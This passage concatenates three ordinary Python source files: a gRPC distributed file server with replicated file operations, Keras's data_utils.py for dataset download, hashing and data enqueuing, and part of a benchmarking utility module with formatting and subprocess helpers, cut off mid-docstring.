import sys sys.path.insert(0, "../md_server") import grpc import file_server_pb2 as fs import file_server_pb2_grpc as fs_grpc import md_server_pb2 as ms import md_server_pb2_grpc as ms_grpc import ms_conf from concurrent import futures import time import threading import os import os.path as ospath # send heartbeat to the metadata server def heartbeat(stub, ip, port): while True: time.sleep(2) stub.online(ms.serverInfo(ip=ip, port=port)) class file_server(fs_grpc.file_serverServicer): def __init__(self, ip, port, rootPath): # contact the metadata server mdChannel = grpc.insecure_channel(ms_conf.md_serverIP + ":" + ms_conf.md_serverPort) self.mdStub = ms_grpc.md_serverStub(mdChannel) self.ip = ip self.port = port self.online() self.rootPath = rootPath + "/fserver_{}".format(self.id) if not ospath.exists(self.rootPath): os.mkdir(self.rootPath) os.chdir(self.rootPath) print("Root of the server: {}".format(self.rootPath)) self.curPathDict = {} # fork thread to maintain heartbeat heartbeatThread = threading.Thread(target=heartbeat, args=(self.mdStub, self.ip, self.port)) heartbeatThread.start() # register on the metadata server to be visible to clients def online(self): self.id = (self.mdStub.online(ms.serverInfo(ip=self.ip, port=self.port))).done print("File server {} is available on {}:{}".format(self.id, self.ip, self.port)) # remove self from the md server. def offline(self): self.mdStub.offline(ms.serverInfo(ip=self.ip, port=self.port)) print("File server {} now offline\n".format(self.id)) # return a stub connecting to another server. def stub_gen(self, serverList): for serverInfo in serverList: if serverInfo.id == self.id: continue channel = grpc.insecure_channel(serverInfo.ip + ":" + serverInfo.port) stub = fs_grpc.file_serverStub(channel) yield stub # return the absolute path on the server def pwd(self, request, context): if request.id not in self.curPathDict: self.curPathDict[request.id] = "" if request.cascading == True: gen = self.stub_gen((self.mdStub.listServer(ms.empty())).sList) while True: try: next(gen).pwd(fs.stringMes(id=request.id, cascading=0)) except StopIteration: break return fs.stringMes(str=self.curPathDict[request.id]) # list all items in the current dir def ls(self, request, context): path = self.rootPath + "/" + self.curPathDict[request.id] return fs.stringMes(str="\n".join(os.listdir(path))) # enter a given location. Clients are only permitted to operate inside the root dir def cd(self, request, context): path = self.rootPath + "/" + self.curPathDict[request.id] + "/" + request.str if request.str[0] == '/' or not ospath.exists(path) or not ospath.isdir(path): return fs.fs_reply(done=0) path = ospath.abspath(path) # dir pointed by path must be a sub-dir of the root if len(ospath.commonpath([path, self.rootPath])) < len(self.rootPath): return fs.fs_reply(done=0) self.curPathDict[request.id] = path[len(self.rootPath):] if request.cascading == True: gen = self.stub_gen((self.mdStub.listServer(ms.empty())).sList) while True: try: next(gen).cd(fs.stringMes(str=request.str, id=request.id, cascading=0)) except StopIteration: break return fs.fs_reply(done=1) # make a new dir given a valid path def mkdir(self, request, context): path = self.rootPath + "/" + self.curPathDict[request.id] + "/" + request.str if request.str[0] == '/' or ospath.exists(path): return fs.fs_reply(done=0) path = ospath.abspath(path) if len(ospath.commonpath([path, self.rootPath])) < len(self.rootPath): return fs.fs_reply(done=0) os.mkdir(path) if request.cascading == True: gen = self.stub_gen((self.mdStub.listServer(ms.empty())).sList) while True: try: next(gen).mkdir(fs.stringMes(str=request.str, id=request.id, cascading=0)) except StopIteration: break return fs.fs_reply(done=1) # remove a file or dir. Recursive delete for a dir def rm(self, request, context): path = self.rootPath + "/" + self.curPathDict[request.id] + "/" + request.str if request.str[0] == '/' or not ospath.exists(path): return fs.fs_reply(done=0) path = ospath.abspath(path) if len(ospath.commonpath([path, self.rootPath])) < len(self.rootPath): return fs.fs_reply(done=0) if ospath.isdir(path): os.removedirs(path) else: os.remove(path) if request.cascading == True: gen = self.stub_gen((self.mdStub.listServer(ms.empty())).sList) while True: try: next(gen).rm(fs.stringMes(str=request.str, id=request.id, cascading=0)) except StopIteration: break return fs.fs_reply(done=1) # upload given file to the server. Broadcast update to other replicas def upload(self, request, context): path = self.rootPath + "/" + self.curPathDict[request.id] + "/" + request.path if request.path[0] == '/': return fs.fs_reply(done=0) path = ospath.abspath(path) if len(ospath.commonpath([path, self.rootPath])) < len(self.rootPath): return fs.fs_reply(done=0) if not ospath.exists(path): os.mknod(path) with open(path, "wb") as fp: fp.write(request.buffer) if request.cascading == True: gen = self.stub_gen((self.mdStub.listServer(ms.empty())).sList) while True: try: next(gen).upload(fs.upRequest(path=request.path, buffer=request.buffer, id=request.id, cascading=0)) except StopIteration: break return fs.fs_reply(done=1) # download given file from the server. def download(self, request, context): path = self.rootPath + "/" + self.curPathDict[request.id] + "/" + request.path if request.path[0] == '/' or not ospath.exists(path) or not ospath.isfile(path): return fs.bufferMes(done=0) path = ospath.abspath(path) if len(ospath.commonpath([path, self.rootPath])) < len(self.rootPath): return fs.bufferMes(done=0) with open(path, "rb") as fp: content = fp.read() return fs.bufferMes(buffer=content, done=1) def serve(ip, port, rootPath): servicer = file_server(ip, port, rootPath) if not ospath.exists(rootPath): os.mkdir(rootPath) server = grpc.server(futures.ThreadPoolExecutor(max_workers=10)) fs_grpc.add_file_serverServicer_to_server(servicer, server) server.add_insecure_port("[::]:{}".format(port)) server.start() server.wait_for_termination() if __name__ == "__main__": serve("127.0.0.1", sys.argv[1], "/home/jing/code/dfs/data")
data_utils.py
# Copyright 2018 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== # pylint: disable=g-import-not-at-top """Utilities for file download and caching.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from abc import abstractmethod from contextlib import closing import hashlib import multiprocessing from multiprocessing.pool import ThreadPool import os import random import shutil import sys import tarfile import threading import time import traceback import zipfile import numpy as np import six from six.moves.urllib.error import HTTPError from six.moves.urllib.error import URLError from six.moves.urllib.request import urlopen from tensorflow.python.keras._impl.keras.utils.generic_utils import Progbar from tensorflow.python.util.tf_export import tf_export try: import queue except ImportError: import Queue as queue if sys.version_info[0] == 2: def urlretrieve(url, filename, reporthook=None, data=None): """Replacement for `urlretrive` for Python 2. Under Python 2, `urlretrieve` relies on `FancyURLopener` from legacy `urllib` module, known to have issues with proxy management. Arguments: url: url to retrieve. filename: where to store the retrieved data locally. reporthook: a hook function that will be called once on establishment of the network connection and once after each block read thereafter. The hook will be passed three arguments; a count of blocks transferred so far, a block size in bytes, and the total size of the file. data: `data` argument passed to `urlopen`. """ def chunk_read(response, chunk_size=8192, reporthook=None): content_type = response.info().get('Content-Length') total_size = -1 if content_type is not None: total_size = int(content_type.strip()) count = 0 while True: chunk = response.read(chunk_size) count += 1 if reporthook is not None: reporthook(count, chunk_size, total_size) if chunk: yield chunk else: break response = urlopen(url, data) with open(filename, 'wb') as fd: for chunk in chunk_read(response, reporthook=reporthook): fd.write(chunk) else: from six.moves.urllib.request import urlretrieve def _extract_archive(file_path, path='.', archive_format='auto'): """Extracts an archive if it matches tar, tar.gz, tar.bz, or zip formats. Arguments: file_path: path to the archive file path: path to extract the archive file archive_format: Archive format to try for extracting the file. Options are 'auto', 'tar', 'zip', and None. 'tar' includes tar, tar.gz, and tar.bz files. The default 'auto' is ['tar', 'zip']. None or an empty list will return no matches found. Returns: True if a match was found and an archive extraction was completed, False otherwise. """ if archive_format is None: return False if archive_format is 'auto': archive_format = ['tar', 'zip'] if isinstance(archive_format, six.string_types): archive_format = [archive_format] for archive_type in archive_format: if archive_type is 'tar': open_fn = tarfile.open is_match_fn = tarfile.is_tarfile if archive_type is 'zip': open_fn = zipfile.ZipFile is_match_fn = zipfile.is_zipfile if is_match_fn(file_path): with open_fn(file_path) as archive: try: archive.extractall(path) except (tarfile.TarError, RuntimeError, KeyboardInterrupt): if os.path.exists(path): if os.path.isfile(path): os.remove(path) else: shutil.rmtree(path) raise return True return False @tf_export('keras.utils.get_file') def get_file(fname, origin, untar=False, md5_hash=None, file_hash=None, cache_subdir='datasets', hash_algorithm='auto', extract=False, archive_format='auto', cache_dir=None): """Downloads a file from a URL if it not already in the cache. By default the file at the url `origin` is downloaded to the cache_dir `~/.keras`, placed in the cache_subdir `datasets`, and given the filename `fname`. The final location of a file `example.txt` would therefore be `~/.keras/datasets/example.txt`. Files in tar, tar.gz, tar.bz, and zip formats can also be extracted. Passing a hash will verify the file after download. The command line programs `shasum` and `sha256sum` can compute the hash. Arguments: fname: Name of the file. If an absolute path `/path/to/file.txt` is specified the file will be saved at that location. origin: Original URL of the file. untar: Deprecated in favor of 'extract'. boolean, whether the file should be decompressed md5_hash: Deprecated in favor of 'file_hash'. md5 hash of the file for verification file_hash: The expected hash string of the file after download. The sha256 and md5 hash algorithms are both supported. cache_subdir: Subdirectory under the Keras cache dir where the file is saved. If an absolute path `/path/to/folder` is specified the file will be saved at that location. hash_algorithm: Select the hash algorithm to verify the file. options are 'md5', 'sha256', and 'auto'. The default 'auto' detects the hash algorithm in use. extract: True tries extracting the file as an Archive, like tar or zip. archive_format: Archive format to try for extracting the file. Options are 'auto', 'tar', 'zip', and None. 'tar' includes tar, tar.gz, and tar.bz files. The default 'auto' is ['tar', 'zip']. None or an empty list will return no matches found. cache_dir: Location to store cached files, when None it defaults to the [Keras Directory](/faq/#where-is-the-keras-configuration-filed-stored). Returns: Path to the downloaded file """ if cache_dir is None: cache_dir = os.path.join(os.path.expanduser('~'), '.keras') if md5_hash is not None and file_hash is None: file_hash = md5_hash hash_algorithm = 'md5' datadir_base = os.path.expanduser(cache_dir) if not os.access(datadir_base, os.W_OK): datadir_base = os.path.join('/tmp', '.keras') datadir = os.path.join(datadir_base, cache_subdir) if not os.path.exists(datadir): os.makedirs(datadir) if untar: untar_fpath = os.path.join(datadir, fname) fpath = untar_fpath + '.tar.gz' else: fpath = os.path.join(datadir, fname) download = False if os.path.exists(fpath): # File found; verify integrity if a hash was provided. if file_hash is not None: if not validate_file(fpath, file_hash, algorithm=hash_algorithm): print('A local file was found, but it seems to be ' 'incomplete or outdated because the ' + hash_algorithm + ' file hash does not match the original value of ' + file_hash + ' so we will re-download the data.') download = True else: download = True if download: print('Downloading data from', origin) class ProgressTracker(object): # Maintain progbar for the lifetime of download. # This design was chosen for Python 2.7 compatibility. progbar = None def dl_progress(count, block_size, total_size): if ProgressTracker.progbar is None: if total_size is -1: total_size = None ProgressTracker.progbar = Progbar(total_size) else: ProgressTracker.progbar.update(count * block_size) error_msg = 'URL fetch failure on {}: {} -- {}' try: try: urlretrieve(origin, fpath, dl_progress) except URLError as e: raise Exception(error_msg.format(origin, e.errno, e.reason)) except HTTPError as e: raise Exception(error_msg.format(origin, e.code, e.msg)) except (Exception, KeyboardInterrupt) as e: if os.path.exists(fpath): os.remove(fpath) raise ProgressTracker.progbar = None if untar: if not os.path.exists(untar_fpath): _extract_archive(fpath, datadir, archive_format='tar') return untar_fpath if extract: _extract_archive(fpath, datadir, archive_format) return fpath def _hash_file(fpath, algorithm='sha256', chunk_size=65535): """Calculates a file sha256 or md5 hash. Example: ```python >>> from keras.data_utils import _hash_file >>> _hash_file('/path/to/file.zip') 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855' ``` Arguments: fpath: path to the file being validated algorithm: hash algorithm, one of 'auto', 'sha256', or 'md5'. The default 'auto' detects the hash algorithm in use. chunk_size: Bytes to read at a time, important for large files. Returns: The file hash """ if (algorithm is 'sha256') or (algorithm is 'auto' and len(hash) is 64): hasher = hashlib.sha256() else: hasher = hashlib.md5() with open(fpath, 'rb') as fpath_file: for chunk in iter(lambda: fpath_file.read(chunk_size), b''): hasher.update(chunk) return hasher.hexdigest() def validate_file(fpath, file_hash, algorithm='auto', chunk_size=65535): """Validates a file against a sha256 or md5 hash. Arguments: fpath: path to the file being validated file_hash: The expected hash string of the file. The sha256 and md5 hash algorithms are both supported. algorithm: Hash algorithm, one of 'auto', 'sha256', or 'md5'. The default 'auto' detects the hash algorithm in use. chunk_size: Bytes to read at a time, important for large files. Returns: Whether the file is valid """ if ((algorithm is 'sha256') or (algorithm is 'auto' and len(file_hash) is 64)): hasher = 'sha256' else: hasher = 'md5' if str(_hash_file(fpath, hasher, chunk_size)) == str(file_hash): return True else: return False @tf_export('keras.utils.Sequence') class Sequence(object): """Base object for fitting to a sequence of data, such as a dataset. Every `Sequence` must implements the `__getitem__` and the `__len__` methods. If you want to modify your dataset between epochs you may implement `on_epoch_end`. The method `__getitem__` should return a complete batch. # Notes `Sequence` are a safer way to do multiprocessing. This structure guarantees that the network will only train once on each sample per epoch which is not the case with generators. Examples: ```python from skimage.io import imread from skimage.transform import resize import numpy as np import math # Here, `x_set` is list of path to the images # and `y_set` are the associated classes. class CIFAR10Sequence(Sequence): def __init__(self, x_set, y_set, batch_size): self.x, self.y = x_set, y_set self.batch_size = batch_size def __len__(self): return math.ceil(len(self.x) / self.batch_size) def __getitem__(self, idx): batch_x = self.x[idx * self.batch_size:(idx + 1) * self.batch_size] batch_y = self.y[idx * self.batch_size:(idx + 1) * self.batch_size] return np.array([ resize(imread(file_name), (200, 200)) for file_name in batch_x]), np.array(batch_y) ``` """ @abstractmethod def __getitem__(self, index): """Gets batch at position `index`. Arguments: index: position of the batch in the Sequence. Returns: A batch """ raise NotImplementedError @abstractmethod def __len__(self): """Number of batch in the Sequence. Returns: The number of batches in the Sequence. """ raise NotImplementedError def on_epoch_end(self): """Method called at the end of every epoch. """ pass # Global variables to be shared across processes _SHARED_SEQUENCES = {} # We use a Value to provide unique id to different processes. _SEQUENCE_COUNTER = None def get_index(uid, i): """Get the value from the Sequence `uid` at index `i`. To allow multiple Sequences to be used at the same time, we use `uid` to get a specific one. A single Sequence would cause the validation to overwrite the training Sequence. Arguments: uid: int, Sequence identifier i: index Returns: The value at index `i`. """ return _SHARED_SEQUENCES[uid][i] @tf_export('keras.utils.SequenceEnqueuer') class SequenceEnqueuer(object): """Base class to enqueue inputs. The task of an Enqueuer is to use parallelism to speed up preprocessing. This is done with processes or threads. Examples: ```python enqueuer = SequenceEnqueuer(...) enqueuer.start() datas = enqueuer.get() for data in datas: # Use the inputs; training, evaluating, predicting. # ... stop sometime. enqueuer.close() ``` The `enqueuer.get()` should be an infinite stream of datas. """ @abstractmethod def is_running(self): raise NotImplementedError @abstractmethod def start(self, workers=1, max_queue_size=10): """Starts the handler's workers. Arguments: workers: number of worker threads max_queue_size: queue size (when full, threads could block on `put()`). """ raise NotImplementedError @abstractmethod def stop(self, timeout=None): """Stop running threads and wait for them to exit, if necessary. Should be called by the same thread which called start(). Arguments: timeout: maximum time to wait on thread.join() """ raise NotImplementedError @abstractmethod def get(self): """Creates a generator to extract data from the queue. Skip the data if it is `None`. Returns: Generator yielding tuples `(inputs, targets)` or `(inputs, targets, sample_weights)`. """ raise NotImplementedError class OrderedEnqueuer(SequenceEnqueuer): """Builds a Enqueuer from a Sequence. Used in `fit_generator`, `evaluate_generator`, `predict_generator`. Arguments: sequence: A `keras.utils.data_utils.Sequence` object. use_multiprocessing: use multiprocessing if True, otherwise threading shuffle: whether to shuffle the data at the beginning of each epoch """ def __init__(self, sequence, use_multiprocessing=False, shuffle=False): self.sequence = sequence self.use_multiprocessing = use_multiprocessing global _SEQUENCE_COUNTER if _SEQUENCE_COUNTER is None: try: _SEQUENCE_COUNTER = multiprocessing.Value('i', 0) except OSError: # In this case the OS does not allow us to use # multiprocessing. We resort to an int # for enqueuer indexing. _SEQUENCE_COUNTER = 0 if isinstance(_SEQUENCE_COUNTER, int): self.uid = _SEQUENCE_COUNTER _SEQUENCE_COUNTER += 1 else: # Doing Multiprocessing.Value += x is not process-safe. with _SEQUENCE_COUNTER.get_lock(): self.uid = _SEQUENCE_COUNTER.value _SEQUENCE_COUNTER.value += 1 self.shuffle = shuffle self.workers = 0 self.executor_fn = None self.queue = None self.run_thread = None self.stop_signal = None def is_running(self): return self.stop_signal is not None and not self.stop_signal.is_set() def start(self, workers=1, max_queue_size=10): """Start the handler's workers. Arguments: workers: number of worker threads max_queue_size: queue size (when full, workers could block on `put()`) """ if self.use_multiprocessing: self.executor_fn = lambda: multiprocessing.Pool(workers) else: self.executor_fn = lambda: ThreadPool(workers) self.workers = workers self.queue = queue.Queue(max_queue_size) self.stop_signal = threading.Event() self.run_thread = threading.Thread(target=self._run) self.run_thread.daemon = True self.run_thread.start() def _wait_queue(self): """Wait for the queue to be empty.""" while True: time.sleep(0.1) if self.queue.unfinished_tasks == 0 or self.stop_signal.is_set(): return def _run(self): """Submits request to the executor and queue the `Future` objects.""" sequence = list(range(len(self.sequence))) self._send_sequence() # Share the initial sequence while True: if self.shuffle: random.shuffle(sequence) with closing(self.executor_fn()) as executor: for i in sequence: if self.stop_signal.is_set(): return self.queue.put( executor.apply_async(get_index, (self.uid, i)), block=True) # Done with the current epoch, waiting for the final batches self._wait_queue() if self.stop_signal.is_set(): # We're done return # Call the internal on epoch end. self.sequence.on_epoch_end() self._send_sequence() # Update the pool def get(self): """Creates a generator to extract data from the queue. Skip the data if it is `None`. Yields: The next element in the queue, i.e. a tuple `(inputs, targets)` or `(inputs, targets, sample_weights)`. """ try: while self.is_running(): inputs = self.queue.get(block=True).get() self.queue.task_done() if inputs is not None: yield inputs except Exception as e: # pylint: disable=broad-except self.stop() six.raise_from(StopIteration(e), e) def _send_sequence(self): """Send current Sequence to all workers.""" # For new processes that may spawn _SHARED_SEQUENCES[self.uid] = self.sequence def stop(self, timeout=None): """Stops running threads and wait for them to exit, if necessary. Should be called by the same thread which called `start()`. Arguments: timeout: maximum time to wait on `thread.join()` """ self.stop_signal.set() with self.queue.mutex: self.queue.queue.clear() self.queue.unfinished_tasks = 0 self.queue.not_full.notify() self.run_thread.join(timeout) _SHARED_SEQUENCES[self.uid] = None @tf_export('keras.utils.GeneratorEnqueuer') class GeneratorEnqueuer(SequenceEnqueuer): """Builds a queue out of a data generator. The provided generator can be finite in which case the class will throw a `StopIteration` exception. Used in `fit_generator`, `evaluate_generator`, `predict_generator`. Arguments: generator: a generator function which yields data use_multiprocessing: use multiprocessing if True, otherwise threading wait_time: time to sleep in-between calls to `put()` random_seed: Initial seed for workers, will be incremented by one for each worker. """ def __init__(self, generator, use_multiprocessing=False, wait_time=0.05, seed=None): self.wait_time = wait_time self._generator = generator if os.name is 'nt' and use_multiprocessing is True: # On Windows, avoid **SYSTEMATIC** error in `multiprocessing`: # `TypeError: can't pickle generator objects` # => Suggest multithreading instead of multiprocessing on Windows raise ValueError('Using a generator with `use_multiprocessing=True`' ' is not supported on Windows (no marshalling of' ' generators across process boundaries). Instead,' ' use single thread/process or multithreading.') else: self._use_multiprocessing = use_multiprocessing self._threads = [] self._stop_event = None self._manager = None self.queue = None self.seed = seed def _data_generator_task(self): if self._use_multiprocessing is False: while not self._stop_event.is_set(): with self.genlock: try: if (self.queue is not None and self.queue.qsize() < self.max_queue_size): # On all OSes, avoid **SYSTEMATIC** error # in multithreading mode: # `ValueError: generator already executing` # => Serialize calls to # infinite iterator/generator's next() function generator_output = next(self._generator) self.queue.put((True, generator_output)) else: time.sleep(self.wait_time) except StopIteration: break except Exception as e: # pylint: disable=broad-except # Can't pickle tracebacks. # As a compromise, print the traceback and pickle None instead. if not hasattr(e, '__traceback__'): setattr(e, '__traceback__', sys.exc_info()[2]) self.queue.put((False, e)) self._stop_event.set() break else: while not self._stop_event.is_set(): try: if (self.queue is not None and self.queue.qsize() < self.max_queue_size): generator_output = next(self._generator) self.queue.put((True, generator_output)) else: time.sleep(self.wait_time) except StopIteration: break except Exception as e: # pylint: disable=broad-except # Can't pickle tracebacks. # As a compromise, print the traceback and pickle None instead. traceback.print_exc() setattr(e, '__traceback__', None) self.queue.put((False, e)) self._stop_event.set() break def start(self, workers=1, max_queue_size=10): """Kicks off threads which add data from the generator into the queue. Arguments: workers: number of worker threads max_queue_size: queue size (when full, threads could block on `put()`) """ try: self.max_queue_size = max_queue_size if self._use_multiprocessing: self._manager = multiprocessing.Manager() self.queue = self._manager.Queue(maxsize=max_queue_size) self._stop_event = multiprocessing.Event() else: # On all OSes, avoid **SYSTEMATIC** error in multithreading mode: # `ValueError: generator already executing` # => Serialize calls to infinite iterator/generator's next() function self.genlock = threading.Lock() self.queue = queue.Queue(maxsize=max_queue_size) self._stop_event = threading.Event() for _ in range(workers): if self._use_multiprocessing: # Reset random seed else all children processes # share the same seed np.random.seed(self.seed) thread = multiprocessing.Process(target=self._data_generator_task) thread.daemon = True if self.seed is not None: self.seed += 1 else: thread = threading.Thread(target=self._data_generator_task) self._threads.append(thread) thread.start() except: self.stop() raise def is_running(self): return self._stop_event is not None and not self._stop_event.is_set() def stop(self, timeout=None): """Stops running threads and wait for them to exit, if necessary. Should be called by the same thread which called `start()`. Arguments: timeout: maximum time to wait on `thread.join()`. """ if self.is_running(): self._stop_event.set() for thread in self._threads: if self._use_multiprocessing: if thread.is_alive(): thread.terminate() else: # The thread.is_alive() test is subject to a race condition: # the thread could terminate right after the test and before the # join, rendering this test meaningless -> Call thread.join() # always, which is ok no matter what the status of the thread. thread.join(timeout) if self._manager: self._manager.shutdown() self._threads = [] self._stop_event = None self.queue = None def get(self): """Creates a generator to extract data from the queue. Skip the data if it is `None`. Yields: The next element in the queue, i.e. a tuple `(inputs, targets)` or `(inputs, targets, sample_weights)`. """ while self.is_running(): if not self.queue.empty(): success, value = self.queue.get() # Rethrow any exceptions found in the queue if not success: six.reraise(value.__class__, value, value.__traceback__) # Yield regular values if value is not None: yield value else: all_finished = all([not thread.is_alive() for thread in self._threads]) if all_finished and self.queue.empty(): raise StopIteration() else: time.sleep(self.wait_time) # Make sure to rethrow the first exception in the queue, if any while not self.queue.empty(): success, value = self.queue.get() if not success: six.reraise(value.__class__, value, value.__traceback__)
util.py
# -*- coding: utf-8 -*- # Licensed under a 3-clause BSD style license - see LICENSE.rst """ Various low-level utilities. """ from __future__ import (absolute_import, division, print_function, unicode_literals) import datetime import json import math import os import re import select import signal import subprocess import struct import sys import time import errno import threading import shutil import stat import shlex import operator import collections import multiprocessing import six from six.moves import xrange from .extern import minify_json nan = float('nan') inf = float('inf') WIN = (os.name == 'nt') if not WIN: try: from select import PIPE_BUF except ImportError: # PIPE_BUF is not available on Python 2.6 PIPE_BUF = os.pathconf('.', os.pathconf_names['PC_PIPE_BUF']) TIMEOUT_RETCODE = -256 class UserError(Exception): pass class ParallelFailure(Exception): """ Custom exception to work around a multiprocessing bug https://bugs.python.org/issue9400 """ def __new__(cls, message, exc_cls, traceback_str): self = Exception.__new__(cls) self.message = message self.exc_cls = exc_cls self.traceback_str = traceback_str return self def __reduce__(self): return (ParallelFailure, (self.message, self.exc_cls, self.traceback_str)) def __str__(self): return "{0}: {1}\n {2}".format(self.exc_cls.__name__, self.message, self.traceback_str.replace("\n", "\n ")) def reraise(self): if self.exc_cls is UserError: raise UserError(self.message) else: raise self def human_list(l): """ Formats a list of strings in a human-friendly way. """ l = ["'{0}'".format(x) for x in l] if len(l) == 0: return 'nothing' elif len(l) == 1: return l[0] elif len(l) == 2: return ' and '.join(l) else: return ', '.join(l[:-1]) + ' and ' + l[-1] def human_float(value, significant=3, truncate_small=None, significant_zeros=False): """ Return a string representing a float with human friendly significant digits. Switches to scientific notation for too large/small numbers. If `truncate_small`, then leading zeros of numbers < 1 are counted as significant. If not `significant_zeros`, trailing unnecessary zeros are stripped. """ if value == 0: return "0" elif math.isinf(value) or math.isnan(value): return "{}".format(value) elif value < 0: sign = "-" value = -value else: sign = "" logv = math.log10(value) magnitude = int(math.floor(logv)) + 1 if truncate_small is not None: magnitude = max(magnitude, -truncate_small + 1) num_digits = significant - magnitude if magnitude <= -5 or magnitude >= 9: # Too many digits, use scientific notation fmt = "{{0:.{0}e}}".format(significant) elif value == int(value): value = int(round(value, num_digits)) fmt = "{0:d}" elif num_digits <= 0: value = int(round(value, num_digits)) fmt = "{0:d}" else: fmt = "{{0:.{0}f}}".format(num_digits) formatted = sign + fmt.format(value) if not significant_zeros and '.' in formatted and 'e' not in fmt: formatted = formatted.rstrip('0') if formatted[-1] == '.': formatted = formatted[:-1] if significant_zeros and '.' not in formatted: if len(formatted) < significant: formatted += "." + "0"*(significant - len(formatted)) return formatted def human_file_size(size, err=None): """ Returns a human-friendly string representing a file size that is 2-4 characters long. For example, depending on the number of bytes given, can be one of:: 256b 64k 1.1G Parameters ---------- size : int The size of the file (in bytes) Returns ------- size : str A human-friendly representation of the size of the file """ size = float(size) if size < 1: size = 0.0 suffixes = ' kMGTPEH' if size == 0: num_scale = 0 else: num_scale = int(math.floor(math.log(size) / math.log(1000))) if num_scale > 7: suffix = '?' else: suffix = suffixes[num_scale].strip() scale = int(math.pow(1000, num_scale)) value = size / scale str_value = human_float(value, 3) if err is None: return "{0:s}{1}".format(str_value, suffix) else: str_err = human_float(err / scale, 1, truncate_small=2) return "{0:s}±{1:s}{2}".format(str_value, str_err, suffix) _human_time_units = ( ('ns', 0.000000001), ('μs', 0.000001), ('ms', 0.001), ('s', 1), ('m', 60), ('h', 60 * 60), ('d', 60 * 60 * 24), ('w', 60 * 60 * 24 * 7), ('y', 60 * 60 * 24 * 7 * 52), ('C', 60 * 60 * 24 * 7 * 52 * 100) ) def human_time(seconds, err=None): """ Returns a human-friendly time string that is always exactly 6 characters long. Depending on the number of seconds given, can be one of:: 1w 3d 2d 4h 1h 5m 1m 4s 15s Will be in color if console coloring is turned on. Parameters ---------- seconds : int The number of seconds to represent Returns ------- time : str A human-friendly representation of the given number of seconds that is always exactly 6 characters. """ units = _human_time_units seconds = float(seconds) scale = seconds if scale == 0 and err is not None: scale = float(err) if scale == 0: # Represent zero in reasonable units units = [('s', 1), ('m', 60)] if scale != scale: # nan return "n/a" for i in xrange(len(units) - 1): if scale < units[i+1][1]: str_time = human_float(seconds / units[i][1], 3, significant_zeros=True) if err is None: return "{0:s}{1}".format(str_time, units[i][0]) else: str_err = human_float(err / units[i][1], 1, truncate_small=2) return "{0:s}±{1:s}{2}".format(str_time, str_err, units[i][0]) return '~0' def human_value(value, unit, err=None): """ Formats a value in a given unit in a human friendly way. Parameters ---------- value : anything The value to format unit : str The unit the value is in. Currently understands `seconds` and `bytes`. err : float, optional Std. error in the value """ if isinstance(value, (int, float)): if value != value: # nan display = "n/a" elif unit == 'seconds': display = human_time(value, err=err) elif unit == 'bytes': display = human_file_size(value, err=err) else: display = json.dumps(value) if err is not None: display += "±{:.2g}".format(err) elif value is None: display = "failed" else: display = json.dumps(value) return display def parse_human_time(string, base_period='d'): """ Parse a human-specified time period to an integer number of seconds. The following format is accepted: <number><suffix> Raises a ValueError on parse error. """ units = dict(_human_time_units) units[''] = units[base_period] suffixes = '|'.join(units.keys()) try: m = re.match(r'^\s*([0-9.]+)\s*({})\s*$'.format(suffixes), string) if m is None: raise ValueError() return float(m.group(1)) * units[m.group(2)] except ValueError: raise ValueError("%r is not a valid time period (valid units: %s)" % (string, suffixes)) def which(filename, paths=None): """ Emulates the UNIX `which` command in Python. Raises an IOError if no result is found. """ # Hide traceback from expected exceptions in pytest reports __tracebackhide__ = operator.methodcaller('errisinstance', IOError) if os.path.sep in filename: locations = [''] elif paths is not None: locations = paths else: locations = os.environ.get("PATH", "").split(os.pathsep) if WIN: # On windows, an entry in %PATH% may be quoted locations = [path[1:-1] if len(path) > 2 and path[0] == path[-1] == '"' else path for path in locations] if WIN: filenames = [filename + ext for ext in ('.exe', '.bat', '.com', '')] else: filenames = [filename] candidates = [] for location in locations: for filename in filenames: candidate = os.path.join(location, filename) if os.path.isfile(candidate) or os.path.islink(candidate): candidates.append(candidate) if len(candidates) == 0: if paths is None: loc_info = 'PATH' else: loc_info = os.pathsep.join(locations) raise IOError("Could not find '{0}' in {1}".format(filename, loc_info)) return candidates[0] def has_command(filename): """ Returns `True` if the commandline utility exists. """ try: which(filename) except IOError: return False else: return True class ProcessError(subprocess.CalledProcessError): def __init__(self, args, retcode, stdout, stderr): self.args = args self.retcode = retcode self.stdout = stdout self.stderr = stderr def __str__(self): if self.retcode == TIMEOUT_RETCODE: return "Command '{0}' timed out".format( ' '.join(self.args)) else: return "Command '{0}' returned non-zero exit status {1}".format( ' '.join(self.args), self.retcode) def check_call(args, valid_return_codes=(0,), timeout=600, dots=True, display_error=True, shell=False, env=None, cwd=None): """ Runs the given command in a subprocess, raising ProcessError if it fails. See `check_output` for parameters. """ # Hide traceback from expected exceptions in pytest reports __tracebackhide__ = operator.methodcaller('errisinstance', ProcessError) check_output( args, valid_return_codes=valid_return_codes, timeout=timeout, dots=dots, display_error=display_error, shell=shell, env=env, cwd=cwd) class DebugLogBuffer(object): def __init__(self, log): self.buf = [] self.first = True self.linebreak_re = re.compile(b'.*\n') self.log = log def __call__(self, c): if c is None: text = b"".join(self.buf) del self.buf[:] elif b'\n' in c: m = self.linebreak_re.match(c) j = m.end() self.buf.append(c[:j]) text = b"".join(self.buf) self.buf[:] = [c[j:]] else: self.buf.append(c) return text = text.decode('utf-8', 'replace') if text.endswith('\n'): text = text[:-1] if text: if self.first: self.log.debug('OUTPUT -------->', continued=True) self.first = False self.log.debug(text, continued=True) def check_output(args, valid_return_codes=(0,), timeout=600, dots=True, display_error=True, shell=False, return_stderr=False, env=None, cwd=None, redirect_stderr=False, return_popen=False): """ Runs the given command in a subprocess, raising ProcessError if it fails. Returns stdout as a string on success. Parameters ---------- valid_return_codes : list, optional A list of return codes to ignore. Defaults to only ignoring zero. Setting to None ignores all return codes. timeout : number, optional Kill the process if it does not produce any output in `timeout` seconds. If `None`, there is no timeout. Default: 10 min dots : bool, optional If `True` (default) write a dot to the console to show progress as the subprocess outputs content. May also be a callback function to call (with no arguments) to indicate progress. display_error : bool, optional If `True` (default) display the stdout and stderr of the subprocess when the subprocess returns an error code. shell : bool, optional If `True`, run the command through the shell. 